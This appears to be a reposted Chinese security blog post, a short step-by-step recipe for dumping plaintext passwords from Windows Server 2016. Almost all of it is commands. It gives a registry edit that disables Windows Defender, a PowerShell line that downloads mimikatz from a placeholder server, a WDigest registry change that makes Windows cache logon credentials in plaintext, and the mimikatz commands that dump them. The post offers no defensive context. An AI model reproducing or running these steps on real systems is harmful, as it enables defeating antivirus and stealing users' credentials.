Windows Server 2016抓取明文密碼


Windows Server 2016抓取明文密碼
 
 

臨時禁止Windows Defender

1
2
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force

下載mimikatz后解壓縮。

1
powershell.exe -NoP -NonI -Exec Bypass -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://你的服務器/mimikatz_trunk.zip' "%APPDATA%\mimikatz_trunk.zip"}"

修改注冊表開啟UseLogonCredential

1
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

等用戶下次再登錄的時候,可抓到明文密碼

1
2
mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit
Windows Server 2016抓取明文密碼
 
 
Windows Server 2016抓取明文密碼
 
 

 

原創文章,作者:moonsec,如若轉載,請注明出處:https://www.moonsec.com/archives/2854


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM